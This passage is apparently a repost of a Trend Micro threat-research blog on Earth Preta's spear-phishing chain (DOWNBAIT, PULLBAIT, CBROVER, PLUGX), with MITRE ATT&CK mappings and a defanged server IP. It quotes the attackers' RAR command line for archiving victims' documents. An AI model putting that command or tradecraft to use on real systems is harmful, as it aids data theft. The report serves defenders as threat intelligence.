src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig14.png\" alt=\"Figure 14. Signature of DOWNBAIT\"> <\/a> <\/p>\n<p><figcaption>Figure 14. Signature of DOWNBAIT<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>DOWNBAIT codes are encrypted with a multi-layered XOR and will be decrypted upon execution (Figure 15).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"7d597f\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig15.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig15.png\" alt=\"Figure 15. Decryption of DOWNBAIT code\"> <\/a> <\/p>\n<p><figcaption>Figure 15. Decryption of DOWNBAIT code<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>DOWNBAIT downloads and executes the decoy document from an attacker-controlled server (Figure 16). From the same server, it will also download the PULLBAIT shellcode and execute it in memory (Figure 17).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"50faf9\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig16.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig16.png\" alt=\"Figure 16. Download and execute decoy document\"> <\/a> <\/p>\n<p><figcaption>Figure 16. Download and execute decoy document<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"b47f32\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig17.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig17.png\" alt=\"Figure 17. Download and execute PULLBAIT into memory\"> <\/a> <\/p>\n<p><figcaption>Figure 17. Download and execute PULLBAIT into memory<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>PULLBAIT is a straightforward shellcode which will perform further download and execution. In the observed campaign, PULLBAIT will download and execute CBROVER, the first-stage backdoor (Figure 18).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"7152b3\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig18.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig18.png\" alt=\"Figure 18. PULLBAIT downloads and executes CBROVER\"> <\/a> <\/p>\n<p><figcaption>Figure 18. PULLBAIT downloads and executes CBROVER<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>The spear-phishing email and the .url attachment is tailored based on the targets and are paired with the decoy documents. Up until this point, all tools and components are downloaded from an attacker-controller webdav server hosted in <i>16[.]162[.]188[.]93<\/i>.<\/p>\n<h4><i>Network Discovery, Persistence, and Control<\/i><\/h4>\n<h5><b>CBROVER and PLUGX<\/b><\/h5>\n<p>CBROVER is a backdoor that supports file download and remote shell execution. It\u2019s spawned by using DLL side-loading techniques (Figure 19).&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"a97658\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig19.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig19.png\" alt=\"Figure 19. CBROVER spawned via DLL side-loading\"> <\/a> <\/p>\n<p><figcaption>Figure 19. CBROVER spawned via DLL side-loading<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div class=\"responsive-table-wrap\" readability=\"9\">\n<p>Through CBROVER, the first PLUGX components (Table 2) were deployed to target the machine and launched though DLL side-loading techniques (Figure 20).<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\" width=\"624\">\n<tbody readability=\"2\">\n<tr>\n<td width=\"164\" valign=\"top\"><b>File name<\/b><\/td>\n<td width=\"460\" valign=\"top\"><b>Description<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"164\" valign=\"top\">kmrefresh.exe<\/td>\n<td width=\"460\" valign=\"top\">Legitimate executable used to load coreglobconfig.dll<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"164\" valign=\"top\">coreglobconfig.dll<\/td>\n<td width=\"460\" valign=\"top\">Malicious loader used to execute PLUGX (glob.dat)<\/td>\n<\/tr>\n<tr>\n<td width=\"164\" valign=\"top\">glob.dat<\/td>\n<td width=\"460\" valign=\"top\">Encrypted PLUGX<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 2. List of the first PLUGX components deployed through CBROVER<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"863a39\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig20.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig20.png\" alt=\"Figure 20. First PLUGX components (kmrefresh.exe) deployed and executed through CBROVER (Edge.exe)\"> <\/a> <\/p>\n<p><figcaption>Figure 20. First PLUGX components (kmrefresh.exe) deployed and executed through CBROVER (Edge.exe)<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.403892944039\">\n<div readability=\"14.744525547445\">\n<p>After checking the components, the deployed PLUGX variant is same as the general type of PLUGX which was used by Earth Preta in previous <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/b\/earth-preta-campaign-targets-asia-doplugs.html\" target=\"_blank\" rel=\"noopener\">DOPLUGS<\/a> campaigns.<\/p>\n<p>Afterward, a file collector, tracked as FILESAC was deployed into the compromised machine and started to collect victim\u2019s files (Figure 21). The details about the FILESAC are discussed in the \u201cCollection and Exfiltration\u201d section of this blog entry.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6.5\">\n<figure class=\"image-figure\" readability=\"3\"> <a id=\"2c5d85\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig21.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig21.png\" alt=\"Figure 21. PLUGX components(kmrefresh.exe) injected into dllhost.exe and drop the FILESAC (FileServer0501.exe) for data collection\"> <\/a> <\/p>\n<p><figcaption>Figure 21. PLUGX components(kmrefresh.exe) injected into dllhost.exe and drop the FILESAC (FileServer0501.exe) for data collection<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div class=\"responsive-table-wrap\" readability=\"12\">\n<p>It\u2019s worth noting that there would be second-stage PLUGX components (shown in Table 3) through prior PLUGX after initial PLUGX installation. Compared to first-stage PLUGX, the second-stage PLUGX shellcode was protected by using RC4 and Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. The execution of those environmentally keyed payloads is constrained to a specific target environment and poses a challenge on follow-up malware analysis.<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"3\">\n<tr>\n<td width=\"164\" valign=\"top\"><b>File name<\/b><\/td>\n<td width=\"460\" valign=\"top\"><b>Description<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"164\" valign=\"top\">Canonlog.exe<\/td>\n<td width=\"460\" valign=\"top\">Legitimate executable used to load coreglobconfig.dll<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"164\" valign=\"top\">ceiinfolog.dll<\/td>\n<td width=\"460\" valign=\"top\">Malicious loader used to execute PLUGX (cannon.dat)<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"164\" valign=\"top\">cannon.dat<\/td>\n<td width=\"460\" valign=\"top\">Second-stage PLUGX.&nbsp; (Encrypted by RC4 and DPAPI)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 3. List of second-stage PLUGX components<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.37540192926\">\n<div readability=\"18.679260450161\">\n<h4><i>Collection and Exfiltration<\/i><\/h4>\n<p>Collection has been observed to be performed in two ways:&nbsp;&nbsp;<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">The first method is via RAR, which is launched by PLUGX via command line:&nbsp;<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">&#8220;RAR.exe&nbsp; a -r -m3&nbsp; -tk -ed -dh -v4500m -hp&lt;archive password&gt; -ibck -ta&lt;cutoff date&gt; -n*.doc* -n*.rtf* -n*.xls* -n*.pdf* -n*.ppt* -n*.jpg* -n*.cdr* -n*.dwg* -n*.png* -n*.psd* -n*.JPE* -n*.BMP* -n*.TIF* -n*.dib* \\&#8221;&lt;collection storage path&gt;\\\\&lt;archive name&gt;.RAR\\&#8221; \\&#8221;&lt;target path for collection&gt;&#8221;&#8221;&nbsp;<\/span><\/li>\n<\/ul>\n<ul>\n<li><span class=\"rte-red-bullet\">The second method is by USING FILESAC, a configurable tool, which will be downloaded and launched by PLUGX. It\u2019s implemented based on an open-source tool, \u201c<a href=\"https:\/\/github.com\/crazyHH\/FileSearchAndCompress\/tree\/master\" target=\"_blank\" rel=\"noopener\">FileSearchAndCompress<\/a>\u201d and its configuration was embedded in the tools as follows:&nbsp;<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Target file types: doc|docx|xls|xlsx|ppt|pptx|pdf|jpg|cdr|dwg&nbsp;<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Target time: 2024-05-01 ~ 2024-12-31&nbsp;<\/span><\/li>\n<\/ul>\n<p>In our telemetry, we have observed that collected documents are exfiltrated using a currently unknown tool. Based on what we observed, the tool accepts the archive filename as its argument, and upon inspecting generated network traffic, The tool connects to several IP addresses that are related to Microsoft\u2019s cloud services, which include identity platform for token exchange, Graph API host server, and OneDrive-related ones.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"885b83\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig22.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig22.png\" alt=\"Figure 22. Tool outbound connections after being launched by PLUGX\"> <\/a> <\/p>\n<p><figcaption>Figure 22. Tool outbound connections after being launched by PLUGX<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>This kind of traffic implies the tool is using a refresh token, connect to the identity exchange platform to exchange it for an authentication token to then interact with a cloud service (implied to be OneDrive) using Graph API.<\/p>\n<h4><i>Other Observations on 16[.]162[.]188[.]93<\/i><\/h4>\n<p>During our inspection of the download site at IP address 16[.]162[.]188[.]93, we discovered that it hosts a WebDAV server (Figure 23). This server contains numerous decoy documents, along with various malware samples, including DOWNBAIT, PULLBAIT, and CBOROVER.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"84b78e\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig23.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig23.png\" alt=\"Figure 23. The file server of 16[.]162[.]188[.]93\"> <\/a> <\/p>\n<p><figcaption>Figure 23. The file server of 16[.]162[.]188[.]93<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37.5\">\n<div readability=\"20\">\n<p>Inside the folder \u201c\/1\u201d, the malware PULLBAIT and CBROVER are located, and in the folder \u201c\/projects\u201d there are two subfolders which are \u201c\/documents\u201d and \u201c\/done\u201d. The archived DOWNBAIT is stored in the folder \u201c\/done\u201d, while the decoy documents are found in the folder \u201c\/documents\u201d (Figure 24).<\/p>\n<p>All the subfolders within these two directories are named after the dates they were created. The earliest created folder is \u201c2024-06-5\u201d and the latest one is \u201c2024-07-11\u201d. Since the files within the date-named folders are deleted after around one day, we believe that the actions targeting specific victims are executed very quickly, within a single day. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"b6ce02\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig24.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig24.png\" alt=\"Figure 24. The subfolders in \u201d\/projects\/documents\/\u201d\"> <\/a> <\/p>\n<p><figcaption>Figure 24. The subfolders in \u201d\/projects\/documents\/\u201d<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"36.5\">\n<div readability=\"18\">\n<p>Based on the filenames and content of the decoy documents, we can potentially identify their targets. The countries that were likely targeted include Myanmar, the Philippines, Vietnam, Singapore, Cambodia and Taiwan, all located in the APAC region. Additionally, the decoy documents predominantly focus on topics related to government, particularly foreign affairs (Figures 25 and 26).&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"8f3316\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig25.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig25.png\" alt=\"Figure 25. Decoy document from Communist Party in Vietnam\"> <\/a> <\/p>\n<p><figcaption>Figure 25. Decoy document from Communist Party in Vietnam<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"e106b3\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig26.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/EarthPretaNewMalwareStrategies-Fig26.png\" alt=\"Figure 26. Decoy invitation to the 2024 Global Leadership Program\"> <\/a> <\/p>\n<p><figcaption>Figure 26. Decoy invitation to the 2024 Global Leadership Program<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"43.949074074074\">\n<div class=\"responsive-table-wrap\" readability=\"32.961805555556\">\n<h4>Conclusion<\/h4>\n<p>Earth Preta has shown significant advancements in their malware deployment and strategies, particularly in their campaigns targeting government entities, which include those in the military, police, foreign affair agencies, welfare, the executive branch, and education in the APAC region.<\/p>\n<p>The group has evolved their tactics, notably with sophisticated malware variants like HIUPAN and its ability to propagate via removable drives, which allow it to quickly deliver PUBLOAD; and the introduction of new tools like FDMTP and PTSOCKET to enhance their control and exfiltration capabilities.<\/p>\n<p>Additionally, the recent fast-paced spear-phishing campaigns we observed in June demonstrate their adaptability, leveraging multi-stage downloaders (from DOWNBAIT to PLUGX) and possibly exploiting Microsoft&#8217;s cloud services for data exfiltration. The quick turnover of decoy documents and malware samples on the WebDAV server hosted at 16[.]162[.]188[.]93 suggests that Earth Preta is executing highly targeted and time-sensitive operations, focusing on specific countries and industries within APAC region. Earth Preta has remained highly active in APAC and will likely remain active in the foreseeable future. This evolving threat landscape highlights the need for continuous vigilance and updated defensive measures to counteract Earth Preta&#8217;s sophisticated and adaptive techniques.<\/p>\n<h4>MITRE ATT&amp;CK<\/h4>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"32\">\n<tr>\n<td width=\"116\" valign=\"top\"><b>Tactic<\/b><\/td>\n<td width=\"230\" valign=\"top\"><b>Technique<\/b><\/td>\n<td width=\"90\" valign=\"top\"><b>ID<\/b><\/td>\n<td width=\"187\" valign=\"top\"><b>Description<\/b><\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"116\" rowspan=\"2\" valign=\"top\">Initial Access<\/td>\n<td width=\"230\" valign=\"top\">Replication Through Removable Media<\/td>\n<td width=\"90\" valign=\"top\">T1091<\/td>\n<td width=\"187\" valign=\"top\">HIUPAN spreads through removable drives to deliver PUBLOAD<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"230\" valign=\"top\">Phishing: Spearphishing Attachment<\/td>\n<td width=\"90\" valign=\"top\">T1566.001<\/td>\n<td width=\"187\" valign=\"top\">Uses Spearphishing email to gain access to targets\u2019 systems<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"116\" rowspan=\"2\" valign=\"top\">Persistence<\/td>\n<td width=\"230\" valign=\"top\">Boot or Logon Autostart Execution: Registry Run Keys \/ Startup Folder<\/td>\n<td width=\"90\" valign=\"top\">T1547.00<\/td>\n<td width=\"187\" valign=\"top\">Uses Registry Run keys for persistence<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"230\" valign=\"top\">Scheduled Task\/Job: Scheduled Task<\/td>\n<td width=\"90\" valign=\"top\">T1053.005<\/td>\n<td width=\"187\" valign=\"top\">Uses Scheduled task for persistence<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"116\" rowspan=\"4\" valign=\"top\">Defense Evasion<\/td>\n<td width=\"230\" valign=\"top\">Hijack Execution Flow: DLL Side-Loading<\/td>\n<td width=\"90\" valign=\"top\">T1574.002<\/td>\n<td width=\"187\" valign=\"top\">Several of the malwares are loaded using DLL Side-Loading<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"230\" valign=\"top\">Execution Guardrails: Environmental Keying<\/td>\n<td width=\"90\" valign=\"top\">T1480.001<\/td>\n<td width=\"187\" valign=\"top\">Second stage PLUGX payload is protected with RC4 and DPAPI<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"230\" valign=\"top\">Subvert Trust Controls: Code Signing<\/td>\n<td width=\"90\" valign=\"top\">T1553.002<\/td>\n<td width=\"187\" valign=\"top\">DOWNBAIT are digitally signed<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"230\" valign=\"top\">Process Injection<\/td>\n<td width=\"90\" valign=\"top\">T1055<\/td>\n<td width=\"187\" valign=\"top\">PLUGX will inject its codes to other process launched process with varying arguments<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"116\" rowspan=\"4\" valign=\"top\">Discovery<\/td>\n<td width=\"230\" valign=\"top\">System Information Discovery<\/td>\n<td width=\"90\" valign=\"top\">T1082<\/td>\n<td width=\"187\" valign=\"top\">Commands such as hostname and systeminfo are used to perform System Information Discovery<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"230\" valign=\"top\">Software Discovery: Security Software Discovery<\/td>\n<td width=\"90\" valign=\"top\">T1518.001<\/td>\n<td width=\"187\" valign=\"top\">Wmic is used to discover installed AV products<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"230\" valign=\"top\">System Network Connections Discovery<\/td>\n<td width=\"90\" valign=\"top\">T1049<\/td>\n<td width=\"187\" valign=\"top\">Netstat is used to discover network connections<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"230\" valign=\"top\">System Network Configuration Discovery<\/td>\n<td width=\"90\" valign=\"top\">T1016<\/td>\n<td width=\"187\" valign=\"top\">Commands like ipconfig and netsh are used to discover network configuration<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"116\" valign=\"top\">Collection<\/td>\n<td width=\"230\" valign=\"top\">Data from Local System<\/td>\n<td width=\"90\" valign=\"top\">T1005<\/td>\n<td width=\"187\" valign=\"top\">FILESAC is used to search for specific file types of interest within the system<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"116\" valign=\"top\">&nbsp;<\/td>\n<td width=\"230\" valign=\"top\">Archive Collected Data: Archive via Utility<\/td>\n<td width=\"90\" valign=\"top\">T1560.001<\/td>\n<td width=\"187\" valign=\"top\">Use of WinRAR or FILESAC to archive collected data<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"116\" valign=\"top\">Exfiltration<\/td>\n<td width=\"230\" valign=\"top\">Exfiltration Over Web Service: Exfiltration to Cloud Storage<\/td>\n<td width=\"90\" valign=\"top\">T1567.002<\/td>\n<td width=\"187\" valign=\"top\">Telemetry information suggests possible exfiltration to a cloud service<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"116\" valign=\"top\">&nbsp;<\/td>\n<td width=\"230\" valign=\"top\">Exfiltration Over Alternative Protocol<\/td>\n<td width=\"90\" valign=\"top\">T1048<\/td>\n<td width=\"187\" valign=\"top\">Data are exfiltrated to attacker-controlled servers using cURL or PTSOCKET<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"116\" valign=\"top\">Command and Control<\/td>\n<td width=\"230\" valign=\"top\">Application Layer Protocol: Web Protocols<\/td>\n<td width=\"90\" valign=\"top\">T1071.001<\/td>\n<td width=\"187\" valign=\"top\">Downloaders and Backdoors communicate with C&amp;C using HTTP\/HTTPS<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center><\/p>\n<h4>Indicators of Compromise (IOCs)<\/h4>\n<p>The full list of IOCs can be found&nbsp;<a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/IOC%20List%20-%20Earth%20Preta%20Evolves%20its%20Attacks%20with%20New%20Malware%20and%20Strategies.txt\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/i\/earth-preta-new-malware-and-strategies.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, we discuss our analysis of Earth Preta\u2019s enhancements in their attacks by introducing new tools, malware variants and strategies to their worm-based attacks and their time-sensitive spear-phishing campaign. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9513,9509],"class_list":["post-57056","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-malware","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Earth Preta Evolves its Attacks with New Malware and Strategies 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Earth Preta Evolves its Attacks with New Malware and Strategies 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-09-09T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/EarthPretaNewMalwareStrategies-Header:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-preta-evolves-its-attacks-with-new-malware-and-strategies\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Earth Preta Evolves its Attacks with New Malware and 